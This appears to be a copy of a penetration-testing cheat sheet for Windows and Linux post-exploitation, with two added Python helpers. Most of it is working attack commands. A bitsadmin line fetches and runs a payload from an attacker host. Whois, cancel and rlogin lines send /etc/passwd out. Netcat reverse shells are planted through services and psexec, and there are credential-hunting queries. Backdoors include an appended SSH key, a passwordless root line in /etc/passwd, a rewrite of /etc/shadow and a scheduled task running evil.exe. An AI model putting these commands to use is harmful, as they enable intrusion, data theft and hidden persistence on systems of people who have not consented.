cmd.exe /c "bitsadmin /transfer myjob /download /priority high http://$ATTACKER/payload.exe %tmp%\payload.exe&start %tmp%\payload.exe"

Whois Data Exfiltration

# attacker
nc -l -v -p 43 | sed "s/ //g" | base64 -d
# victim
whois -h $attackerIP -p 43 `cat /etc/passwd | base64`

Data exfiltration via cancel

cancel -u "$(cat /etc/passwd)" -h ip:port

Data exfiltration via rlogin

rlogin -l "$(cat /etc/passwd)" -p port host

Ping sweep of a range

#!/bin/bash
for lastOctet in {1..254}; do
ping -c 1 10.0.0.$lastOctet | grep "bytes from" | cut -d " " -f 4 | cut -d ":" -f 1 &
done

Brute-forcing XOR

encrypted = "encrypted-string-here"
# try every single-byte key (0..255) and print each candidate plaintext
for i in range(256):
    print("".join([chr(ord(e) ^ i) for e in encrypted]))
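
An added example, not part of the original post, that extends the loop above: it tries all 256 single-byte keys over a byte string and ranks the outputs by how much of each looks like English text, so the likely key surfaces without reading 256 lines by hand. The sample plaintext and the key 0x5A are constructed for the demo.

```python
import string

# Bytes that a readable English plaintext is mostly made of: ASCII letters and the space.
LETTERS_AND_SPACE = set(string.ascii_letters.encode()) | {0x20}


def xor_single_byte(data: bytes, key: int) -> bytes:
    """XOR every byte with one key byte (the operation the page's loop performs)."""
    return bytes(b ^ key for b in data)


def english_score(candidate: bytes) -> float:
    """Fraction of bytes that are ASCII letters or spaces; 1.0 means every byte is."""
    if not candidate:
        return 0.0
    return sum(1 for b in candidate if b in LETTERS_AND_SPACE) / len(candidate)


def brute_force_xor(ciphertext: bytes, top: int = 5) -> list:
    """Try all 256 keys and return the best `top` (score, key, plaintext) tuples,
    highest score first; ties are broken by the smaller key."""
    ranked = []
    for key in range(256):
        plain = xor_single_byte(ciphertext, key)
        ranked.append((english_score(plain), key, plain))
    ranked.sort(key=lambda t: (-t[0], t[1]))
    return ranked[:top]


# Constructed sample: a pangram XORed with the key 0x5A.
SAMPLE_KEY = 0x5A
SAMPLE_PLAINTEXT = b"the quick brown fox jumps over the lazy dog"
SAMPLE_CIPHERTEXT = xor_single_byte(SAMPLE_PLAINTEXT, SAMPLE_KEY)


if __name__ == "__main__":
    for score, key, plain in brute_force_xor(SAMPLE_CIPHERTEXT):
        print(f"key=0x{key:02x} score={score:.2f} {plain!r}")
```

For very short ciphertexts several keys can tie at the top; in that case inspect the returned candidates rather than trusting the first one.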

Generating bad characters

# Python
''.join([ "\\x{:02x}".format(i) for i in range(1,256) ])

# Bash
for i in {1..255}; do printf "\\\x%02x" $i; done; echo -e "\r"

.py -> .exe

python pyinstaller.py --onefile convert-to-exe.py

Netcat Portscan

nc -nvv -w 1 -z host 1000-2000
nc -nv -u -z -w 1 host 160-162

Weak Windows service permissions

# Look for SERVICE_ALL_ACCESS in the output
accesschk.exe /accepteula -uwcqv "Authenticated Users" *

sc config [service_name] binpath= "C:\nc.exe 10.11.0.245 443 -e C:\WINDOWS\System32\cmd.exe" obj= "LocalSystem" password= ""
sc qc [service_name] (to verify!)
sc start [service_name]

Find file/folder permissions explicitly granted to a user

icacls.exe C:\folder /findsid userName-or-*sid /t
//look for (F)ull, (M)odify, (W)rite

AlwaysInstallElevated MSI

reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated & reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

AlwaysInstallElevated is a policy setting. Microsoft allows unprivileged users to run installer files (MSI) with SYSTEM privileges; when this policy is enabled, an attacker can escalate to administrator privileges with a malicious MSI file.

Metasploit PowerShell AlwaysInstallElevated privilege escalation in practice

Windows credentials

c:\unattend.xml
c:\sysprep.inf
c:\sysprep\sysprep.xml
dir c:\*vnc.ini /s /b
dir c:\*ultravnc.ini /s /b
dir c:\ /s /b | findstr /si *vnc.ini

findstr /si password *.txt *.xml *.ini
findstr /si pass *.txt *.xml *.ini
dir /s *cred* == *pass* == *.conf

# Windows Autologon
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"

# VNC
reg query "HKCU\Software\ORL\WinVNC3\Password"

# Putty
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions"

# Registry
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s

Unquoted service paths

wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """
wmic service get name,displayname,pathname,startmode | findstr /i /v "C:\Windows\\" |findstr /i /v """
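
An added defender-side example, not from the original post: the three filters behind the wmic one-liners above (Auto start, outside C:\Windows\, no quotes) applied in Python to constructed `wmic service get name,displayname,pathname,startmode /format:csv` output, plus the intermediate paths Windows would probe for each finding, which are the locations whose write permissions need checking. The service names and paths in the sample are hypothetical.

```python
import csv
import io

# Constructed sample of wmic CSV output (hypothetical services; the Node column is
# the host name wmic prepends).
SAMPLE_WMIC_CSV = """\
Node,DisplayName,Name,PathName,StartMode
WS01,Print Spooler,Spooler,C:\\Windows\\System32\\spoolsv.exe,Auto
WS01,Good Vendor Agent,GoodSvc,"C:\\Program Files\\Good Vendor\\agent.exe" -run,Auto
WS01,Bad Vendor Updater,BadSvc,C:\\Program Files\\Bad Vendor\\Sub Dir\\updater.exe -silent,Auto
WS01,Manual Tool,ManualSvc,C:\\Program Files\\Other\\tool.exe,Manual
WS01,No Space Service,NoSpace,C:\\Tools\\nospace.exe,Auto
"""


def executable_path(pathname: str) -> str:
    """Binary part of an unquoted service command line (up to and including .exe)."""
    idx = pathname.lower().find(".exe")
    return pathname if idx < 0 else pathname[:idx + 4]


def is_unquoted_with_space(pathname: str) -> bool:
    """True when the path is not quoted and the executable path itself contains a space."""
    pathname = pathname.strip()
    if pathname.startswith('"'):
        return False
    return " " in executable_path(pathname)


def search_candidates(pathname: str) -> list:
    """Paths the service control manager would try before the real binary for an
    unquoted path with spaces; each one's parent directory needs its ACL reviewed."""
    parts = executable_path(pathname.strip()).split(" ")
    return [" ".join(parts[:i]) + ".exe" for i in range(1, len(parts))]


def find_unquoted_services(wmic_csv: str, auto_only: bool = True) -> list:
    """Apply the page's filters (Auto start, outside C:\\Windows\\, unquoted) to wmic
    CSV output. Returns (service name, PathName, candidate paths) tuples."""
    findings = []
    # QUOTE_NONE keeps the quote characters, since a quoted path is exactly what we test for.
    reader = csv.DictReader(io.StringIO(wmic_csv), quoting=csv.QUOTE_NONE)
    for row in reader:
        path = row["PathName"].strip()
        if auto_only and row["StartMode"].strip().lower() != "auto":
            continue
        if executable_path(path).lower().startswith("c:\\windows\\"):
            continue
        if is_unquoted_with_space(path):
            findings.append((row["Name"], path, search_candidates(path)))
    return findings


if __name__ == "__main__":
    for name, path, candidates in find_unquoted_services(SAMPLE_WMIC_CSV):
        print(f"{name}: {path}\n  would first try: {candidates}")
```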

Service backdoor

sc create spotlessSrv binpath= "C:\nc.exe 10.11.0.245 443 -e C:\WINDOWS\System32\cmd.exe" obj= "LocalSystem" password= ""

Port Forwarding / SSH Tunneling

SSH: Local Port Forwarding

# Listen on local port 8080 and forward incoming traffic to REMOTE_HOST:PORT via SSH_SERVER
# Scenario: access a host that's being blocked by a firewall via SSH_SERVER;
ssh -L 127.0.0.1:8080:REMOTE_HOST:PORT user@SSH_SERVER

SSH: Dynamic Port Forwarding

# Listen on local port 8080. Incoming traffic to 127.0.0.1:8080 forwards it to final destination via SSH_SERVER
# Scenario: proxy your web traffic through SSH tunnel OR access hosts on internal network via a compromised DMZ box;
ssh -D 127.0.0.1:8080 user@SSH_SERVER

SSH: Remote Port Forwarding

# Open port 5555 on SSH_SERVER. Incoming traffic to SSH_SERVER:5555 is tunneled to LOCALHOST:3389
# Scenario: expose RDP on non-routable network;
ssh -R 5555:LOCAL_HOST:3389 user@SSH_SERVER
plink -R ATTACKER:ATTACKER_PORT:127.0.0.1:80 -l root -pw pw ATTACKER_IP

Proxy tunnel

# Open a local port 127.0.0.1:5555. Incoming traffic to 5555 is proxied to DESTINATION_HOST through PROXY_HOST:3128
# Scenario: a remote host has SSH running, but it's only bound to 127.0.0.1, but you want to reach it;
proxytunnel -p PROXY_HOST:3128 -d DESTINATION_HOST:22 -a 5555
ssh user@127.0.0.1 -p 5555

HTTP tunnel

# Server - open port 80. Redirect all incoming traffic to localhost:80 to localhost:22
hts -F localhost:22 80

# Client - open port 8080. Redirect all incoming traffic to localhost:8080 to 192.168.1.15:80
htc -F 8080 192.168.1.15:80

# Client - connect to localhost:8080 -> get tunneled to 192.168.1.15:80 -> get redirected to 192.168.1.15:22
ssh localhost -p 8080

Netsh port forwarding

# requires admin
netsh interface portproxy add v4tov4 listenaddress=localaddress listenport=localport connectaddress=destaddress connectport=destport

RunAs

runas is a command in the Microsoft Windows family of operating systems that lets a user run specific tools and programs under a different user name than the one used for the interactive logon. It is similar to the Unix commands sudo and su, but the Unix commands usually require prior configuration by the system administrator before they work for a particular user and/or command.

powershell

# Requires PSRemoting
$username = 'Administrator';$password = '1234test';$securePassword = ConvertTo-SecureString $password -AsPlainText -Force;$credential = New-Object System.Management.Automation.PSCredential $username, $securePassword;Invoke-Command -Credential $credential -ComputerName COMPUTER_NAME -Command { whoami }

# without PSRemoting
cmd> powershell Start-Process cmd.exe -Credential (New-Object System.Management.Automation.PSCredential 'username', (ConvertTo-SecureString 'password' -AsPlainText -Force))

# without PS Remoting, with arguments
cmd> powershell -command "start-process cmd.exe -argumentlist '/c calc' -Credential (New-Object System.Management.Automation.PSCredential 'username',(ConvertTo-SecureString 'password' -AsPlainText -Force))"

CMD

# Requires interactive console
runas /user:userName cmd.exe

PsExec

psexec -accepteula -u user -p password cmd /c c:\temp\nc.exe 10.11.0.245 80 -e cmd.exe

Pth-WinExe

pth-winexe -U user%pass --runas=user%pass //10.1.1.1 cmd.exe

Find hidden files

dir /A:H /s "c:\program files"

Common file search operations

# Query the local locate database for a quick file find. Run updatedb before executing locate.
locate passwd

# Show which file would be executed in the current environment, depending on $PATH environment variable;
which nc wget curl php perl python netcat tftp telnet ftp

# Search for *.conf (case-insensitive) files recursively starting with /etc;
find /etc -iname *.conf

Maintaining access

Registry hives

hivexsh /registry/file

hivexsh - Windows registry hive shell

Decrypting VNC passwords

wine vncpwdump.exe -k key

Create a user and add it to the Administrators group

net user spotless spotless /add & net localgroup Administrators spotless /add

tip: when the command gives no output, a failed add is often because the password does not meet the password policy

SSH keys

mkdir /root/.ssh 2>/dev/null; echo 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQChKCUsFVWj1Nz8SiM01Zw/BOWcMNs2Zwz3MdT7leLU9/Un4mZ7vjco0ctsyh2swjphWr5WZG28BN90+tkyj3su23UzrlgEu3SaOjVgxhkx/Pnbvuua9Qs9gWbWyRxexaC1eDb0pKXHH2Msx+GlyjfDOngq8tR6tkU8u1S4lXKLejaptiz0q6P0CcR6hD42IYkqyuWTNrFdSGLtiPCBDZMZ/5g1cJsyR59n54IpV0b2muE3F7+NPQmLx57IxoPjYPNUbC6RPh/Saf7o/552iOcmVCdLQDR/9I+jdZIgrOpstqSiJooU9+JImlUtAkFxZ9SHvtRbFt47iH7Sh7LiefP5 root@kali' >> /root/.ssh/authorized_keys

Backdoor account

echo 'spotless::0:0:root:/root:/bin/bash' >> /etc/passwd

# Rarely needed, but if you need to add a password to the previously created user by using useradd and passwd is not working. Pwd is "kali"
sed 's/!/\$6$o1\.HFMVM$a3hY6OPT\/DiQYy4koI6Z3\/sLiltsOcFoS5yCKhBBqQLH5K1QlHKL8\/6wJI6uF\/Q7mniOdq92v6yjzlVlXlxkT\./' /etc/shadow > /etc/s2; cat /etc/s2 > /etc/shadow; rm /etc/s2

Create another root user

useradd -u0 -g0 -o -s /bin/bash -p `openssl passwd yourpass` rootuser

OpenSSL Password

openssl passwd -1 password 
# output $1$YKbEkrkZ$7Iy/M3exliD/yJfJVeTn5.

Scheduled task backdoor

# Launch evil.exe every 10 minutes
schtasks /create /sc minute /mo 10 /tn "TaskName" /tr C:\Windows\system32\evil.exe

References:

Original: https://ired.team/offensive-security-experiments/offensive-security-cheetsheets#bypassing-file-upload-restrictions

Chinese translation: https://xz.aliyun.com/t/4555#toc-114
